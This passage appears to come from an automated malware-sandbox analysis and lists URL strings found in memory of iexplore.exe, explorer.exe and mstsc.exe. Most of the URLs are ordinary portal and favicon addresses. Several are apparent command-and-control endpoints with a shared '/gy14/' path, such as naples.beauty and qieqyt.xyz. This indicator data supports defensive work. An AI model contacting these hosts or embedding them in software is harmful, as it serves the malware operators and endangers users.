          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mtv.com/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mtv.com/favicon.icoQ
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.myspace.com/favicon.icoX
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.myxtremecleanshq.services
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.myxtremecleanshq.services/gy14/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.myxtremecleanshq.services/gy14/www.883831.com
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.myxtremecleanshq.servicesReferer:
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.najdi.si/
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4206940642.0000000011609000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000006.00000002.4162691903.0000000005819000.00000004.10000000.00040000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4156302014.000000001AA49000.00000004.00000001.00040000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4230395387.000000000DEC9000.00000004.00000001.00040000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4258424973.00000000124C9000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.naples.beauty
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4206940642.0000000011609000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000006.00000002.4162691903.0000000005819000.00000004.10000000.00040000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4156302014.000000001AA49000.00000004.00000001.00040000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4230395387.000000000DEC9000.00000004.00000001.00040000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4258424973.00000000124C9000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.naples.beauty/gy14/
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.naples.beauty/gy14/www.6733633.com
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.naples.beautyReferer:
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.news.com.au/favicon.icoDj
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4159269749.000001BA5A831000.00000004.00000020.00020000.00000000.sdmp, msapplication.xml4.13.drString found in binary or memory: http://www.nytimes.com/
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.orange.fr/
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ozon.ru/favicon.icoxx
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.priceminister.com/favicon.icoE
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qieqyt.xyz
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qieqyt.xyz/gy14/
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qieqyt.xyz/gy14/www.tryscriptify.com
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qieqyt.xyzReferer:
          Source: iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rambler.ru/favicon.icoGx
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: iexplore.exe, 0000000D.00000002.4159269749.000001BA5A831000.00000004.00000020.00020000.00000000.sdmp, msapplication.xml5.13.drString found in binary or memory: http://www.reddit.com/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D4A9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.reddit.com/.urllG
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.roelofsen.online
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.roelofsen.online/gy14/
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.roelofsen.online/gy14/www.amiciperlacoda.com
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.roelofsen.onlineReferer:
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rtl.de/
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rtl.de/Ik
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rtl.de/favicon.icoCj
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sciencemediainstitute.com
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sciencemediainstitute.com/gy14/
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sciencemediainstitute.com/gy14/www.247fracing.com
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sciencemediainstitute.comReferer:
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sify.com/favicon.ico.j
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.smnyg.com
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.smnyg.com/gy14/
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.smnyg.com/gy14/JKKKKJKK
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.smnyg.comReferer:
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sogou.com/
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sogou.com/gB
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.soso.com/
